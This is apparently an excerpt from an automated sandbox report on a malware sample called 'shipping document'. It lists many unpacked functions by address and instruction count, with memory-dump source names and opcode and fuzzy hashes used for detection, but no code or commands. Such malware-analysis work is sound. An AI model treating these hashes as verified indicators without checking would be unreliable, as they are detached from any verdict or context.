                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01766154 Relevance: .1, Instructions: 133COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2ec84e6191e703d0b49a15aa23f4b34231580ff8bcba3e4f6ea52b353d1b06d7
                                                                                                • Instruction ID: bbf26865cbadfc92a9431ddfd13d698b25578a358862d31283f2e24ca47caf18
                                                                                                • Opcode Fuzzy Hash: 2ec84e6191e703d0b49a15aa23f4b34231580ff8bcba3e4f6ea52b353d1b06d7
                                                                                                • Instruction Fuzzy Hash: 8B51F570904256DFDB259B28CC04BE8FBB9FF15314F5482E9E929A72D5E734A981CF80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01760BCD Relevance: .1, Instructions: 130COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 06cfaf86bd8b45b6babd7156cf7f461501900d41859e96aa8919ab759da8e837
                                                                                                • Instruction ID: 8fa58e66eda63f21d8667726e4ec48e60bcd841096f01ce5ea1e330846ecb83d
                                                                                                • Opcode Fuzzy Hash: 06cfaf86bd8b45b6babd7156cf7f461501900d41859e96aa8919ab759da8e837
                                                                                                • Instruction Fuzzy Hash: 5C418F31A402299BDF21DF68C984BEAF7B8EF45740F4100A5E908AB345DB749E84CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0182866E Relevance: .1, Instructions: 129COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                • Instruction ID: d9ce742f2b2ee11b6e19a72beebe65bd53f69b2d9395c0012b44e6327cca6b34
                                                                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                • Instruction Fuzzy Hash: E7417375B00129AFDF16DB99CC84AAFBBFAAF85710F144069E904D7345DA70DF418760
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01760887 Relevance: .1, Instructions: 128COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bde0c7b107c94d48745ca53082478f48ccabf50132ba58faa25d970fc11940f9
                                                                                                • Instruction ID: 69f2b1597c8ca019bbd289e34c6841e26cf464d9cee51a2e5b30eb805e52e3a2
                                                                                                • Opcode Fuzzy Hash: bde0c7b107c94d48745ca53082478f48ccabf50132ba58faa25d970fc11940f9
                                                                                                • Instruction Fuzzy Hash: D1419FB16007029FE725CF28C484A26F7FEFF49314B248A6DE95787A51E730E855CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0178A470 Relevance: .1, Instructions: 127COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fdff279cdba5582bb0addd2d6dfef953435e93abf22c91d157b41ae435a1c7d0
                                                                                                • Instruction ID: 3922b8dc9b2ef6f04aefe259adb0e8918b87f8c10c53b0f42c7cd61a5243cebf
                                                                                                • Opcode Fuzzy Hash: fdff279cdba5582bb0addd2d6dfef953435e93abf22c91d157b41ae435a1c7d0
                                                                                                • Instruction Fuzzy Hash: C3418E35980205CFDF25EF6CD4947A9FBB0FB58720F24019AD511BB295EB389A80CFA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01768BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 23c7c52eb76ea56b9be04935cca81a6c84f45aa2c4791745e8ef9f56faa80ac6
                                                                                                • Instruction ID: c24f8cbff53391ad36aab10157f4338961dc96d69356da27bab99504b0258fda
                                                                                                • Opcode Fuzzy Hash: 23c7c52eb76ea56b9be04935cca81a6c84f45aa2c4791745e8ef9f56faa80ac6
                                                                                                • Instruction Fuzzy Hash: B741F232900302CBD724DF5CD884A5AFBB9FF98704F14816EDD019B65AD7799A82CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01758918 Relevance: .1, Instructions: 123COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0bb9956d24d512efe832b92d1cd28a171241c74d9d39bfbab283c00666937c56
                                                                                                • Instruction ID: 34e9d8b1ffd37247f3db3d24b6d6586ec7ee9e75c1cfeb9082e02279e3e705e5
                                                                                                • Opcode Fuzzy Hash: 0bb9956d24d512efe832b92d1cd28a171241c74d9d39bfbab283c00666937c56
                                                                                                • Instruction Fuzzy Hash: A24129315083469FE312DF698880AABF7E9EF88B54F40092AF994D7250E771DE058B93
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0175A020 Relevance: .1, Instructions: 122COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                • Instruction ID: e7f2e7702db855a890e68141a1f76627a06036b873d8f4d5e6b82af3a5699ccc
                                                                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                • Instruction Fuzzy Hash: F2412731A00211EFDB61DE698494BFAFBB1EB50764F15817AED498B244E772CD80CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017609AD Relevance: .1, Instructions: 122COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9c7aed5a7aa5edcfc2b1209ef06ec8457f9e7f4d6d9d1acbb9396779e0b04ce4
                                                                                                • Instruction ID: b778b2eacf8dee2fa78e0777b381c067403dae8c082edc105e032dc8fa7166b1
                                                                                                • Opcode Fuzzy Hash: 9c7aed5a7aa5edcfc2b1209ef06ec8457f9e7f4d6d9d1acbb9396779e0b04ce4
                                                                                                • Instruction Fuzzy Hash: 7B416971640701EFD721CF18C840B6AFBF9FF58754F248A6AE8598B251E771EA42CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01790710 Relevance: .1, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                • Instruction ID: fdcee3c990ae131b5602458319fb92eb48e1ee046b0dfb8f9d9bff211b757b8f
                                                                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                • Instruction Fuzzy Hash: 2B41F671A10605EFDB24CF98D980AAAFBF9FF18710B10496DE556DB651D330EA48CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0176262C Relevance: .1, Instructions: 119COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 85926dc547b3e762bbf87a2db0c8b0a03240f7a8d9f291dd9b5708bd1e9d6e22
                                                                                                • Instruction ID: 5a693fc109c22769f79f4bfb1e6de52ecf14b742127235fd6808c04464603ff3
                                                                                                • Opcode Fuzzy Hash: 85926dc547b3e762bbf87a2db0c8b0a03240f7a8d9f291dd9b5708bd1e9d6e22
                                                                                                • Instruction Fuzzy Hash: B4410370501701CFCBA2EF28C944B65F7F9FF48314F2482A9C9069B6A6EB349A40CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0179C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 72191f4c97fb07148b39d1cecac6ce0d5f0cd66fd5f109a4961057bb7eee00fb
                                                                                                • Instruction ID: cca23d0593dc2dfca4e4908d6199c00e4b290566f39b9785bb2970340ebd6c0d
                                                                                                • Opcode Fuzzy Hash: 72191f4c97fb07148b39d1cecac6ce0d5f0cd66fd5f109a4961057bb7eee00fb
                                                                                                • Instruction Fuzzy Hash: 953159B1A00345DFDB12CFA8D440B99FBF0EB49724F2485AED519EB251D3769A06CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017E07C3 Relevance: .1, Instructions: 114COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c8512bf387d14c168bb7d4ccb935183c6bc018bd978c606495d0181853fcafa6
                                                                                                • Instruction ID: d5d12b494d36dd91d9aa6e929471bbc48d3df853d3d1950ecc377252d8220b48
                                                                                                • Opcode Fuzzy Hash: c8512bf387d14c168bb7d4ccb935183c6bc018bd978c606495d0181853fcafa6
                                                                                                • Instruction Fuzzy Hash: 524190B26443019FD320DF29C849B9BFBE8FF88654F404A2EF598D7255D7709904CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017580A0 Relevance: .1, Instructions: 111COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 18383bedbc267859446be115a340d6cdd8726b7c00f5993da7cd2bdd56991fb4
                                                                                                • Instruction ID: 28a090ba47a450caca6c382183ad8159ebb59861c97fe53bd715f159d1afa539
                                                                                                • Opcode Fuzzy Hash: 18383bedbc267859446be115a340d6cdd8726b7c00f5993da7cd2bdd56991fb4
                                                                                                • Instruction Fuzzy Hash: FE41EF71E05616AFDB41DF1AC880AA8FBB1BF44760F24822DDC16A7280DBB0ED418BD1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017E05A7 Relevance: .1, Instructions: 111COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a651733e19fafcf097a7019617d7d0097400520b58ccba263c63694fc4808908
                                                                                                • Instruction ID: 3c329fed2dee1e8966413e5ced14a4793e2a3baf2c30c8f3b2b13cded9ff7aee
                                                                                                • Opcode Fuzzy Hash: a651733e19fafcf097a7019617d7d0097400520b58ccba263c63694fc4808908
                                                                                                • Instruction Fuzzy Hash: 9E41C1726046469FD320DF68C844B6AF7E9FFC8700F140A29F9959B680E770E915CBA6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01764859 Relevance: .1, Instructions: 111COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2e626174952420efa33302cfed7b022055d94ee6c2bc0335eb4b341944fd37e2
                                                                                                • Instruction ID: 01e5218cc11611bb28c6de2c6e0830aeaa65b3b2c6e2e9deb36ba72e751de633
                                                                                                • Opcode Fuzzy Hash: 2e626174952420efa33302cfed7b022055d94ee6c2bc0335eb4b341944fd37e2
                                                                                                • Instruction Fuzzy Hash: C741C0306403028FDB25DF28D888B2AFBEEEF80764F14446DEA568B291DB30D901CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01758B50 Relevance: .1, Instructions: 111COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dbdf55cabb8e778510bcef8f493734bde2e0893ac1e034da72c8283c37445758
                                                                                                • Instruction ID: ef64d8c005bddff6783b4815b472656e1cab81255430c87e9759219948db4200
                                                                                                • Opcode Fuzzy Hash: dbdf55cabb8e778510bcef8f493734bde2e0893ac1e034da72c8283c37445758
                                                                                                • Instruction Fuzzy Hash: F4418371E01605CFCB55CF6AC98099DF7F1FF88320B24866ED866A7360D7749941CB41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017702E1 Relevance: .1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                • Instruction ID: a8cc01358ea96f642eb34512c29010015ae7ec802a165bcae798ba51851a8d35
                                                                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                • Instruction Fuzzy Hash: 65312532A00245AFDF22CB68CC84BABFFE9AF15350F0445AAF815D7356D7749884CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0180E3DB Relevance: .1, Instructions: 105COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e46cfb10a6e3182eb01beda6a379bb115195c815534a82be440b73e26c73dcd6
                                                                                                • Instruction ID: 09faa26c59aa9c766fe8f075a3a5b4f8142af172e87cf4fc16dc268642287545
                                                                                                • Opcode Fuzzy Hash: e46cfb10a6e3182eb01beda6a379bb115195c815534a82be440b73e26c73dcd6
                                                                                                • Instruction Fuzzy Hash: 6231BC31750B0AABE723AF658C85F6BB6B5EF59B50F010428F600EB3D5DAA4DD00C7A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01814B4B Relevance: .1, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e1322850cb50f9838156b4e76d4eb8b45b5c61e9f66577709fa52f9ca729071f
                                                                                                • Instruction ID: 27d42aaaf947875822e1109dea9de278b8ef48e762919e6b3eb9f8b3d9fccdf2
                                                                                                • Opcode Fuzzy Hash: e1322850cb50f9838156b4e76d4eb8b45b5c61e9f66577709fa52f9ca729071f
                                                                                                • Instruction Fuzzy Hash: 2231C1322052018FC721DF19D880E26B7E9FB81360F69486DE995CB259E735AE40CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01764260 Relevance: .1, Instructions: 102COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 394d6b4a65a81913e0cf2deacfe22bb97fe1b573997474a6862282b010ebbfa4
                                                                                                • Instruction ID: c557e80d6764b32e9e6282ac03cab52d737790905da1b9bb238c4e2bfc980cbd
                                                                                                • Opcode Fuzzy Hash: 394d6b4a65a81913e0cf2deacfe22bb97fe1b573997474a6862282b010ebbfa4
                                                                                                • Instruction Fuzzy Hash: F541CC35204B45DFD722CF28C984BD6FBE9BF49714F11882DEA9A8B250D774E800CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01814BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0ed172d7491a62afdaf2d67435fce059a3c49b99f1ac4f5409e1d849af54974b
                                                                                                • Instruction ID: 89a01167bef9b6076345e659ad91afc9d4784e77ca22fd6c07214fc547ad99dc
                                                                                                • Opcode Fuzzy Hash: 0ed172d7491a62afdaf2d67435fce059a3c49b99f1ac4f5409e1d849af54974b
                                                                                                • Instruction Fuzzy Hash: 25317E726043028FD720DF28D880E2AB7E9FB84710F19496DE955DB359E734EE05CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017DEB1D Relevance: .1, Instructions: 100COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0aecccf263c82f3a15a5623981e93db1c2401e8d75ef41dadf904de06af6b116
                                                                                                • Instruction ID: 3ff101971bef11e8cd4a6819acee10d1d3daf38220e6dbbb71602725c7f030a9
                                                                                                • Opcode Fuzzy Hash: 0aecccf263c82f3a15a5623981e93db1c2401e8d75ef41dadf904de06af6b116
                                                                                                • Instruction Fuzzy Hash: 4C31AF3170168A9BF723575CCD4CF65FBE8BB40B44F1900A4AA899F6D2DF68E880C321
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 018261C3 Relevance: .1, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f575972d2dd26a826d1693d2772a2ae17735182e94bb42298cbfc67530bd7b20
                                                                                                • Instruction ID: 8dbf6968187b3acbe0e5fd882b5bd7f97c2ada71b0638987d58b6f9657aacbc1
                                                                                                • Opcode Fuzzy Hash: f575972d2dd26a826d1693d2772a2ae17735182e94bb42298cbfc67530bd7b20
                                                                                                • Instruction Fuzzy Hash: 2F31E475A0026AEBDB16DF98CC44BAEF7B5FB45740F554168E900EB244E7B0EE40CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0180483A Relevance: .1, Instructions: 96COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cd785665ee4e83956e03866a7b45c8f088157f8c6e0cf7eb68320c1ae84cfaff
                                                                                                • Instruction ID: 111478f6b4b20a1ca0ace3712630e56e60ece041ee51d45f5a444a89211d540a
                                                                                                • Opcode Fuzzy Hash: cd785665ee4e83956e03866a7b45c8f088157f8c6e0cf7eb68320c1ae84cfaff
                                                                                                • Instruction Fuzzy Hash: 47316776A4012DABCF62DF54DD48BDEBBF9AB98350F1401A5A608E7260DA30DF51CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0178EB20 Relevance: .1, Instructions: 96COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9eb75db2544c541d447b21603ff5e690ee0ebca07cd50300fa529c4adfbccb1c
                                                                                                • Instruction ID: db4f216138c1e5b39db644134da85bfcf6869e12eb7d92db72ca933ce87452ef
                                                                                                • Opcode Fuzzy Hash: 9eb75db2544c541d447b21603ff5e690ee0ebca07cd50300fa529c4adfbccb1c
                                                                                                • Instruction Fuzzy Hash: 7931C472E40215AFDB21EFA9CC44EAEFBF9EF48750F114469E916E7250D7709E408BA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 018260B8 Relevance: .1, Instructions: 95COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 77f875eeb0c3712d644c3ede4eababe9dae9335c88c6fb7171ec26060968668c
                                                                                                • Instruction ID: 95b11cd97194cca5d300b3d3b4d9aa88b281dbd512b3c242d10872c2d9d273cc
                                                                                                • Opcode Fuzzy Hash: 77f875eeb0c3712d644c3ede4eababe9dae9335c88c6fb7171ec26060968668c
                                                                                                • Instruction Fuzzy Hash: F331B671B00A26EBDB139F99C850B6EB7B9EF44754F304069E905DB352EA74EE408B90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017607AF Relevance: .1, Instructions: 95COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2f58d2cab481c962a58e57d0bc31a23920d2c404022cb0c840eb3b0208308bd1
                                                                                                • Instruction ID: 7ca3f4258ff4e0ff7674a5d30d5a997b0162cc2013e49c021037d601a2b85a1f
                                                                                                • Opcode Fuzzy Hash: 2f58d2cab481c962a58e57d0bc31a23920d2c404022cb0c840eb3b0208308bd1
                                                                                                • Instruction Fuzzy Hash: E031E172A44713DBCB22DE28C884EABFBA9EF94260F014569FD55A7310EB30DC0197E1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01768550 Relevance: .1, Instructions: 94COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e3622a04272488db958737a55d122fc2f9d38adf72b70bd2be4ee63f16e21f01
